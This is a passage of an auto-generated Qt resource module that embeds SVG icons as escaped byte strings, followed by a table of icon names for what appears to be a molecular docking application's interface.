\x22st2\x22 d=\x22M129.5,\
202.9c42.2,2.6,7\
7.1-32.2,74.4-74\
.4c-2.3-35.3-31.\
1-63.6-66.4-65.3\
C113.7,62,92.4,7\
2.8,78.9,90l52.1\
,52\x0d\x0a\x09\x09L78.9,89.\
9c-9.7,12.4-15.4\
,28.2-14.8,45.3C\
65.2,171.1,93.7,\
200.6,129.5,202.\
9z\x22/>\x0d\x0a\x09<path cl\
ass=\x22st3\x22 d=\x22M13\
5.8,33c-31.4-0.5\
-58.5,12.4-77.2,\
34.5L84,61l-4.1,\
27.9c13.5-17.2,3\
3.8-26.9,57.6-25\
.8\x0d\x0a\x09\x09c35.3,1.7,\
64.1,30,66.4,65.\
3c2.7,42.3-32.1,\
77.1-74.3,74.4c-\
35.8-2.2-64.4-31\
.8-65.5-67.6c-0.\
4-13.1,2.8-25.3,\
8.6-35.9\x0d\x0a\x09\x09c3.3\
-5.9,2.4-13.3-2.\
4-18l0,0c-7.1-7.\
1-19-5.3-23.8,3.\
4c-8,14.5-12.6,3\
1.3-12.4,49.2c0.\
5,54.9,45.8,99.6\
,100.7,99.1\x0d\x0a\x09\x09c\
55.6-0.4,100.3-4\
6.1,99.3-102C232\
.9,77.5,189.3,34\
,135.8,33z\x22/>\x0d\x0a<\
/g>\x0d\x0a<g>\x0d\x0a\x09<path\
class=\x22st4\x22 d=\x22\
M-212,148.3\x22/>\x0d\x0a\
\x09<path class=\x22st\
4\x22 d=\x22M-212,125.\
3\x22/>\x0d\x0a</g>\x0d\x0a<g>\x0d\
\x0a\x09<path class=\x22s\
t4\x22 d=\x22M128,158.\
5c-18,0-32.5-15.\
8-30.3-34.3c1.7-\
14,13-25.1,26.9-\
26.6c11.7-1.2,22\
.2,4.1,28.2,12.8\
\x0d\x0a\x09\x09c2.6,3.7,6.8\
,6,11.3,6l82.6,0\
c3,0,5.4-2.6,5-5\
.6C243.5,50,191.\
3,3,128,3C73.7,3\
,27.6,37.6,10.3,\
85.8c-5.4,14.9,5\
.8,30.7,21.7,30.\
7\x0d\x0a\x09\x09h0c9.7,0,18\
.3-6.1,21.7-15.2\
C64.7,70.7,94.2,\
48.8,128.3,49c23\
.9,0.1,45.3,10.8\
,59.7,27.7c6.6,7\
.7,3.9,19.7-5.5,\
23.6l0,0\x0d\x0a\x09\x09c-6.\
1,2.6-13.1,0.8-1\
7.4-4.2C156.3,85\
.7,142.9,79,128,\
79c-26.5,0-48.1,\
21.1-49,47.4c-0.\
9,27.2,21.4,50.4\
,48.6,50.6\x0d\x0a\x09\x09c1\
5.2,0.1,28.7-6.7\
,37.8-17.4c4.2-5\
,11.2-6.5,17.2-3\
.9l0,0c9.2,3.9,1\
2.2,15.7,5.7,23.\
3c-14.5,17.1-36.\
1,28-60.4,28\x0d\x0a\x09\x09\
c-34.2,0-63.3-21\
.7-74.3-52.2c-3.\
3-9.2-11.9-15.3-\
21.7-15.3h0c-15.\
9,0-27,15.7-21.7\
,30.6C27.5,218.4\
,73.7,253,128,25\
3\x0d\x0a\x09\x09c63.3,0,115\
.5-47,123.9-107.\
9c0.4-3-2-5.6-5-\
5.6h-82.6c-4.5,0\
-8.6,2.2-11.2,5.\
8C147.6,153.3,13\
8.4,158.5,128,15\
8.5z\x22/>\x0d\x0a</g>\x0d\x0a<\
/svg>\x0d\x0a\
\x00\x00\x02\xfc\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M11,9.5c0.\
3,0,0.5,0.2,0.5,\
0.5v1.5H13c0.3,0\
,0.5,0.2,0.5,0.5\
s-0.2,0.5-0.5,0.\
5h-1.5V14c0,0.3-\
0.2,0.5-0.5,0.5\x0d\
\x0a\x09s-0.5-0.2-0.5-\
0.5v-1.5H9c-0.3,\
0-0.5-0.2-0.5-0.\
5s0.2-0.5,0.5-0.\
5h1.5V10C10.5,9.\
7,10.7,9.5,11,9.\
5z\x22/>\x0d\x0a<path d=\x22\
M17,7.5V17c0,1.1\
-0.9,2-2,2H7c-1.\
1,0-2-0.9-2-2V5c\
0-1.1,0.9-2,2-2h\
5.5L17,7.5z M14,\
7.5c-0.8,0-1.5-0\
.7-1.5-1.5V4H7\x0d\x0a\
\x09C6.4,4,6,4.4,6,\
5v12c0,0.6,0.4,1\
,1,1h8c0.6,0,1-0\
.4,1-1V7.5H14z\x22/\
>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x02\xa0\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 26.2.1,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M9,8.5C9,9\
.3,8.3,10,7.5,10\
S6,9.3,6,8.5S6.7\
,7,7.5,7S9,7.7,9\
,8.5z\x22/>\x0d\x0a<path \
d=\x22M5,4C3.9,4,3,\
4.9,3,6v10c0,1.1\
,0.9,2,2,2h12c1.\
1,0,2-0.9,2-2V6c\
0-1.1-0.9-2-2-2C\
17,4,5,4,5,4z M1\
7,5c0.6,0,1,0.4,\
1,1v6.5\x0d\x0a\x09l-3.8-\
1.9c-0.2-0.1-0.4\
-0.1-0.6,0.1l-3.\
7,3.7l-2.7-1.8c-\
0.2-0.1-0.5-0.1-\
0.6,0.1L4,15V6c0\
-0.6,0.4-1,1-1H1\
7z\x22/>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x04\x88\
<\
?xml version=\x221.\
0\x22 encoding=\x22iso\
-8859-1\x22?>\x0d\x0a<!--\
Generator: Adob\
e Illustrator 19\
.0.0, SVG Export\
Plug-In . SVG V\
ersion: 6.00 Bui\
ld 0) -->\x0d\x0a<svg\
version=\x221.1\x22 i\
d=\x22Layer_1\x22 xmln\
s=\x22http://www.w3\
.org/2000/svg\x22 x\
mlns:xlink=\x22http\
://www.w3.org/19\
99/xlink\x22 x=\x220px\
\x22 y=\x220px\x22\x0d\x0a\x09 vie\
wBox=\x220 0 309.26\
7 309.267\x22 style\
=\x22enable-backgro\
und:new 0 0 309.\
267 309.267;\x22 xm\
l:space=\x22preserv\
e\x22>\x0d\x0a<g>\x0d\x0a\x09<path\
style=\x22fill:#D0\
994B;\x22 d=\x22M260.9\
44,43.491H125.64\
c0,0-18.324-28.9\
94-28.994-28.994\
H48.323c-10.67,0\
-19.329,8.65-19.\
329,19.329\x0d\x0a\x09\x09v2\
22.286c0,10.67,8\
.659,19.329,19.3\
29,19.329h212.62\
1c10.67,0,19.329\
-8.659,19.329-19\
.329V62.82\x0d\x0a\x09\x09C2\
80.273,52.15,271\
.614,43.491,260.\
944,43.491z\x22/>\x0d\x0a\
\x09<path style=\x22fi\
ll:#E4E7E7;\x22 d=\x22\
M28.994,72.484h2\
51.279v77.317H28\
.994V72.484z\x22/>\x0d\
\x0a\x09<path style=\x22f\
ill:#F4B459;\x22 d=\
\x22M19.329,91.814h\
270.609c10.67,0,\
19.329,8.65,19.3\
29,19.329l-19.32\
9,164.298\x0d\x0a\x09\x09c0,\
10.67-8.659,19.3\
29-19.329,19.329\
H38.658c-10.67,0\
-19.329-8.659-19\
.329-19.329L0,11\
1.143C0,100.463,\
8.659,91.814,19.\
329,91.814z\x0d\x0a\x09\x09\x22\
/>\x0d\x0a</g>\x0d\x0a<g>\x0d\x0a<\
/g>\x0d\x0a<g>\x0d\x0a</g>\x0d\x0a\
<g>\x0d\x0a</g>\x0d\x0a<g>\x0d\x0a\
</g>\x0d\x0a<g>\x0d\x0a</g>\x0d\
\x0a<g>\x0d\x0a</g>\x0d\x0a<g>\x0d\
\x0a</g>\x0d\x0a<g>\x0d\x0a</g>\
\x0d\x0a<g>\x0d\x0a</g>\x0d\x0a<g>\
\x0d\x0a</g>\x0d\x0a<g>\x0d\x0a</g\
>\x0d\x0a<g>\x0d\x0a</g>\x0d\x0a<g\
>\x0d\x0a</g>\x0d\x0a<g>\x0d\x0a</\
g>\x0d\x0a<g>\x0d\x0a</g>\x0d\x0a<\
/svg>\x0d\x0a\
\x00\x00\x02\x5c\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M17,7.6v6.\
8L11,18l-6-3.6V7\
.6L11,4C11,4,17,\
7.6,17,7.6z M11.\
5,3.1c-0.3-0.2-0\
.7-0.2-1,0l-6,3.\
6C4.2,6.9,4,7.2,\
4,7.6v6.8\x0d\x0a\x09c0,0\
.4,0.2,0.7,0.5,0\
.9l6,3.6c0.3,0.2\
,0.7,0.2,1,0l6-3\
.6c0.3-0.2,0.5-0\
.5,0.5-0.9V7.6c0\
-0.4-0.2-0.7-0.5\
-0.9L11.5,3.1z\x22/\
>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x03\xc4\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 focusabl\
e=\x22false\x22 xmlns=\
\x22http://www.w3.o\
rg/2000/svg\x22 xml\
ns:xlink=\x22http:/\
/www.w3.org/1999\
/xlink\x22\x0d\x0a\x09 x=\x220p\
x\x22 y=\x220px\x22 viewB\
ox=\x220 0 512 512\x22\
style=\x22enable-b\
ackground:new 0 \
0 512 512;\x22 xml:\
space=\x22preserve\x22\
>\x0d\x0a<style type=\x22\
text/css\x22>\x0d\x0a\x09.st\
0{fill:#941400;s\
troke:#000000;st\
roke-width:5;str\
oke-miterlimit:1\
0;}\x0d\x0a\x09.st1{fill:\
#FFFFFF;}\x0d\x0a\x09.st2\
{fill:#941400;}\x0d\
\x0a</style>\x0d\x0a<circ\
le class=\x22st0\x22 c\
x=\x22256\x22 cy=\x22256\x22\
r=\x22256\x22/>\x0d\x0a<pat\
h class=\x22st1\x22 d=\
\x22M349.8,349.8c5.\
59,12.03,0.44,26\
.31-11.56,31.94c\
-3.31,1.53-6.75,\
2.25-10.19,2.25c\
-9,0-17.66-5.13-\
21.75-13.81\x0d\x0a\x09l-\
38.46-82.19H208v\
72c0,13.25-10.75\
,24-24,24s-24-10\
.75-24-24V152c0-\
13.25,10.75-24,2\
4-24l88,0c44.13,\
0,80,35.88,80,80\
\x0d\x0a\x09c0,28.32-14.8\
7,53.09-37.12,67\
.31L349.8,349.8z\
\x22/>\x0d\x0a<path class\
=\x22st2\x22 d=\x22M272,1\
76h-64v64h64c17.\
66,0,32-14.34,32\
-32S289.7,176,27\
2,176z\x22/>\x0d\x0a</svg\
>\x0d\x0a\
\x00\x00\x03p\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 20 20\x22 sty\
le=\x22enable-backg\
round:new 0 0 20\
20;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<st\
yle type=\x22text/c\
ss\x22>\x0d\x0a\x09.st0{fill\
-rule:evenodd;cl\
ip-rule:evenodd;\
}\x0d\x0a</style>\x0d\x0a<pa\
th class=\x22st0\x22 d\
=\x22M8.5,14c3,0,5.\
5-2.5,5.5-5.5S11\
.5,3,8.5,3l0,0C5\
.5,3,3,5.5,3,8.5\
S5.5,14,8.5,14z \
M15,8.5c0,3.6-2.\
9,6.5-6.5,6.5\x0d\x0a\x09\
S2,12.1,2,8.5S4.\
9,2,8.5,2S15,4.9\
,15,8.5z\x22/>\x0d\x0a<pa\
th d=\x22M12.3,13.7\
c0,0,0.1,0.1,0.1\
,0.1l3.9,3.8c0.4\
,0.4,1,0.4,1.4,0\
s0.4-1,0-1.4l-3.\
9-3.9c0,0-0.1-0.\
1-0.1-0.1\x0d\x0a\x09C13.\
3,12.9,12.9,13.3\
,12.3,13.7L12.3,\
13.7z\x22/>\x0d\x0a<path \
class=\x22st0\x22 d=\x22M\
5,8.5C5,8.2,5.2,\
8,5.5,8h6C11.8,8\
,12,8.2,12,8.5S1\
1.8,9,11.5,9h-6C\
5.2,9,5,8.8,5,8.\
5z\x22/>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x02\x8d\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22em\
oji\x22 xmlns=\x22http\
://www.w3.org/20\
00/svg\x22 xmlns:xl\
ink=\x22http://www.\
w3.org/1999/xlin\
k\x22 x=\x220px\x22 y=\x220p\
x\x22\x0d\x0a\x09 viewBox=\x220\
0 72 72\x22 style=\
\x22enable-backgrou\
nd:new 0 0 72 72\
;\x22 xml:space=\x22pr\
eserve\x22>\x0d\x0a<style\
type=\x22text/css\x22\
>\x0d\x0a\x09.st0{opacity\
:0.6;}\x0d\x0a\x09.st1{fi\
ll:#0D6EFD;}\x0d\x0a\x09.\
st2{fill:none;st\
roke:#000000;str\
oke-width:2;stro\
ke-linejoin:roun\
d;}\x0d\x0a</style>\x0d\x0a<\
g id=\x22color\x22 cla\
ss=\x22st0\x22>\x0d\x0a\x09<cir\
cle class=\x22st1\x22 \
cx=\x2236\x22 cy=\x2236\x22 \
r=\x2230\x22/>\x0d\x0a</g>\x0d\x0a\
<g id=\x22line\x22>\x0d\x0a\x09\
<circle class=\x22s\
t2\x22 cx=\x2236\x22 cy=\x22\
36\x22 r=\x2231\x22/>\x0d\x0a</\
g>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x02\x8d\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22em\
oji\x22 xmlns=\x22http\
://www.w3.org/20\
00/svg\x22 xmlns:xl\
ink=\x22http://www.\
w3.org/1999/xlin\
k\x22 x=\x220px\x22 y=\x220p\
x\x22\x0d\x0a\x09 viewBox=\x220\
0 72 72\x22 style=\
\x22enable-backgrou\
nd:new 0 0 72 72\
;\x22 xml:space=\x22pr\
eserve\x22>\x0d\x0a<style\
type=\x22text/css\x22\
>\x0d\x0a\x09.st0{opacity\
:0.6;}\x0d\x0a\x09.st1{fi\
ll:#FFC107;}\x0d\x0a\x09.\
st2{fill:none;st\
roke:#000000;str\
oke-width:2;stro\
ke-linejoin:roun\
d;}\x0d\x0a</style>\x0d\x0a<\
g id=\x22color\x22 cla\
ss=\x22st0\x22>\x0d\x0a\x09<cir\
cle class=\x22st1\x22 \
cx=\x2236\x22 cy=\x2236\x22 \
r=\x2230\x22/>\x0d\x0a</g>\x0d\x0a\
<g id=\x22line\x22>\x0d\x0a\x09\
<circle class=\x22s\
t2\x22 cx=\x2236\x22 cy=\x22\
36\x22 r=\x2231\x22/>\x0d\x0a</\
g>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x03\xbc\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M4.5,5.5C4\
.5,4.7,5.2,4,6,4\
h10c0.8,0,1.5,0.\
7,1.5,1.5v3.6c1.\
1,0.3,1.7,1.4,1.\
4,2.4c-0.2,0.7-0\
.7,1.3-1.4,1.4v3\
.6\x0d\x0a\x09c0,0.8-0.7,\
1.5-1.5,1.5H6c-0\
.8,0-1.5-0.7-1.5\
-1.5v-3.6c-1.1-0\
.3-1.7-1.4-1.4-2\
.4c0.2-0.7,0.7-1\
.3,1.4-1.4V5.5z \
M5.5,9.1\x0d\x0a\x09c1.1,\
0.3,1.7,1.4,1.4,\
2.4c-0.2,0.7-0.7\
,1.3-1.4,1.4v3.6\
C5.5,16.8,5.7,17\
,6,17h10c0.3,0,0\
.5-0.2,0.5-0.5v-\
3.6\x0d\x0a\x09c-1.1-0.3-\
1.7-1.4-1.4-2.4c\
0.2-0.7,0.7-1.3,\
1.4-1.4V5.5C16.5\
,5.2,16.3,5,16,5\
H6C5.7,5,5.5,5.2\
,5.5,5.5V9.1z M5\
,10c-0.6,0-1,0.4\
-1,1\x0d\x0a\x09c0,0.6,0.\
4,1,1,1s1-0.4,1-\
1C6,10.4,5.6,10,\
5,10z M17,10c-0.\
6,0-1,0.4-1,1c0,\
0.6,0.4,1,1,1s1-\
0.4,1-1C18,10.4,\
17.6,10,17,10z\x22/\
>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x03\xef\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M5,4C4.4,4\
,4,4.4,4,5s0.4,1\
,1,1s1-0.4,1-1S5\
.6,4,5,4z M3,5c0\
-1.1,0.9-2,2-2c0\
.9,0,1.7,0.6,1.9\
,1.5h8.1\x0d\x0a\x09c0.3-\
1.1,1.4-1.7,2.4-\
1.4s1.7,1.4,1.4,\
2.4c-0.2,0.7-0.7\
,1.3-1.4,1.4v8.1\
c1.1,0.3,1.7,1.4\
,1.4,2.4s-1.4,1.\
7-2.4,1.4\x0d\x0a\x09c-0.\
7-0.2-1.3-0.7-1.\
4-1.4H6.9c-0.3,1\
.1-1.4,1.7-2.4,1\
.4s-1.7-1.4-1.4-\
2.4c0.2-0.7,0.7-\
1.3,1.4-1.4V6.9C\
3.6,6.7,3,5.9,3,\
5z M5.5,6.9\x0d\x0a\x09v8\
.1c0.7,0.2,1.3,0\
.7,1.4,1.4h8.1c0\
.2-0.7,0.7-1.3,1\
.4-1.4V6.9c-0.7-\
0.2-1.3-0.7-1.4-\
1.4H6.9C6.8,6.2,\
6.2,6.8,5.5,6.9z\
M17,4\x0d\x0a\x09c-0.6,0\
-1,0.4-1,1s0.4,1\
,1,1s1-0.4,1-1S1\
7.6,4,17,4z M5,1\
6c-0.6,0-1,0.4-1\
,1s0.4,1,1,1s1-0\
.4,1-1S5.6,16,5,\
16z M17,16\x0d\x0a\x09c-0\
.6,0-1,0.4-1,1s0\
.4,1,1,1s1-0.4,1\
-1S17.6,16,17,16\
z\x22/>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x03H\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M8.5,10C8.\
2,10,8,10.2,8,10\
.5S8.2,11,8.5,11\
h5c0.3,0,0.5-0.2\
,0.5-0.5S13.8,10\
,13.5,10H8.5z M8\
,12.5C8,12.2,8.2\
,12,8.5,12h5\x0d\x0a\x09c\
0.3,0,0.5,0.2,0.\
5,0.5S13.8,13,13\
.5,13h-5C8.2,13,\
8,12.8,8,12.5z M\
8,14.5C8,14.2,8.\
2,14,8.5,14h2c0.\
3,0,0.5,0.2,0.5,\
0.5\x0d\x0a\x09S10.8,15,1\
0.5,15h-2C8.2,15\
,8,14.8,8,14.5z\x22\
/>\x0d\x0a<path d=\x22M12\
.5,3H7C5.9,3,5,3\
.9,5,5v12c0,1.1,\
0.9,2,2,2h8c1.1,\
0,2-0.9,2-2V7.5L\
12.5,3z M12.5,4v\
2c0,0.8,0.7,1.5,\
1.5,1.5h2V17\x0d\x0a\x09c\
0,0.6-0.4,1-1,1H\
7c-0.6,0-1-0.4-1\
-1V5c0-0.6,0.4-1\
,1-1H12.5z\x22/>\x0d\x0a<\
/svg>\x0d\x0a\
\x00\x00\x03\xd1\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M17,7.5V17\
c0,1.1-0.9,2-2,2\
H7c-1.1,0-2-0.9-\
2-2V5c0-1.1,0.9-\
2,2-2h5.5L17,7.5\
z M14,7.5c-0.8,0\
-1.5-0.7-1.5-1.5\
V4H7\x0d\x0a\x09C6.4,4,6,\
4.4,6,5v12c0,0.6\
,0.4,1,1,1h8c0.6\
,0,1-0.4,1-1V7.5\
H14z\x22/>\x0d\x0a<path d\
=\x22M7.5,15.5C7.5,\
15.2,7.7,15,8,15\
h3c0.3,0,0.5,0.2\
,0.5,0.5S11.3,16\
,11,16H8C7.7,16,\
7.5,15.8,7.5,15.\
5z M7.5,13.5\x0d\x0a\x09C\
7.5,13.2,7.7,13,\
8,13h6c0.3,0,0.5\
,0.2,0.5,0.5S14.\
3,14,14,14H8C7.7\
,14,7.5,13.8,7.5\
,13.5z M9.1,9.8l\
1.3,0.9l1.9-1.9\x0d\
\x0a\x09c0.1-0.1,0.2-0\
.1,0.3,0l1.9,1v1\
.8c0,0.3-0.2,0.5\
-0.5,0.5H8c-0.3,\
0-0.5-0.2-0.5-0.\
5V11C7.5,11,9,9.\
7,9.1,9.8z M9.3,\
9\x0d\x0a\x09C9.7,9,10,8.\
7,10,8.3c0-0.4-0\
.3-0.8-0.8-0.8S8\
.5,7.8,8.5,8.3C8\
.5,8.7,8.8,9,9.3\
,9z\x22/>\x0d\x0a</svg>\x0d\x0a\
\
\x00\x00\x02\x8d\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22em\
oji\x22 xmlns=\x22http\
://www.w3.org/20\
00/svg\x22 xmlns:xl\
ink=\x22http://www.\
w3.org/1999/xlin\
k\x22 x=\x220px\x22 y=\x220p\
x\x22\x0d\x0a\x09 viewBox=\x220\
0 72 72\x22 style=\
\x22enable-backgrou\
nd:new 0 0 72 72\
;\x22 xml:space=\x22pr\
eserve\x22>\x0d\x0a<style\
type=\x22text/css\x22\
>\x0d\x0a\x09.st0{opacity\
:0.6;}\x0d\x0a\x09.st1{fi\
ll:#198754;}\x0d\x0a\x09.\
st2{fill:none;st\
roke:#000000;str\
oke-width:2;stro\
ke-linejoin:roun\
d;}\x0d\x0a</style>\x0d\x0a<\
g id=\x22color\x22 cla\
ss=\x22st0\x22>\x0d\x0a\x09<cir\
cle class=\x22st1\x22 \
cx=\x2236\x22 cy=\x2236\x22 \
r=\x2230\x22/>\x0d\x0a</g>\x0d\x0a\
<g id=\x22line\x22>\x0d\x0a\x09\
<circle class=\x22s\
t2\x22 cx=\x2236\x22 cy=\x22\
36\x22 r=\x2231\x22/>\x0d\x0a</\
g>\x0d\x0a</svg>\x0d\x0a\
"
qt_resource_name = b"\
\x00\x05\
\x00o\xa6S\
\x00i\
\x00c\x00o\x00n\x00s\
\x00\x08\
\x06\x98T'\
\x00p\
\x00o\x00s\x00e\x00.\x00s\x00v\x00g\
\x00\x07\
\x0a7Z\x07\
\x00c\
\x00m\x00d\x00.\x00s\x00v\x00g\
\x00\x09\
\x09e\x83\xe7\
\x00e\
\x00r\x00r\x00o\x00r\x00.\x00s\x00v\x00g\
\x00\x0a\
\x08I\x05g\
\x00l\
\x00i\x00g\x00a\x00n\x00d\x00.\x00s\x00v\x00g\
\x00\x09\
\x08\x88\xa9\x07\
\x00s\
\x00h\x00a\x00r\x00e\x00.\x00s\x00v\x00g\
\x00\x0a\
\x04\x11v\x07\
\x00z\
\x00o\x00o\x00m\x00i\x00n\x00.\x00s\x00v\x00g\
\x00\x07\
\x09kZ\x07\
\x00b\
\x00o\x00x\x00.\x00s\x00v\x00g\
\x00\x08\
\x05\xe2T\xa7\
\x00l\
\x00o\x00g\x00o\x00.\x00s\x00v\x00g\
\x00\x07\
\x04\xcaZ'\
\x00n\
\x00e\x00w\x00.\x00s\x00v\x00g\
\x00\x09\
\x07\xd8\xba\xa7\
\x00i\
\x00m\x00a\x00g\x00e\x00.\x00s\x00v\x00g\
\x00\x0a\
\x0a\xc8\xf6\x87\
\x00f\
\x00o\x00l\x00d\x00e\x00r\x00.\x00s\x00v\x00g\
\x00\x0d\
\x0a@.\x07\
\x00m\
\x00o\x00l\x00e\x00c\x00u\x00l\x00a\x00r\x00.\x00s\x00v\x00g\
\x00\x0c\
\x04rb'\
\x00r\
\x00e\x00c\x00e\x00p\x00t\x00o\x00r\x00.\x00s\x00v\x00g\
\x00\x0b\
\x07\xc5\x96G\
\x00z\
\x00o\x00o\x00m\x00o\x00u\x00t\x00.\x00s\x00v\x00g\
\x00\x07\
\x09\xc1Z'\
\x00r\
\x00u\x00n\x00.\x00s\x00v\x00g\
\x00\x08\
\x0cGT\x07\
\x00p\
\x00e\x00n\x00d\x00.\x00s\x00v\x00g\
\x00\x07\
\x01UZ'\
\x00j\
\x00o\x00b\x00.\x00s\x00v\x00g\
\x00\x0c\
\x05g\xd3\x87\
\x00b\
\x00o\x00u\x00n\x00d\x00i\x00n\x00g\x00.\x00s\x00v\x00g\
\x00\x08\
\x06\xc1T\x07\
\x00o\
\x00p\x00e\x00n\x00.\x00s\x00v\x00g\
\x00\x08\
\x08\xc8U\xe7\
\x00s\
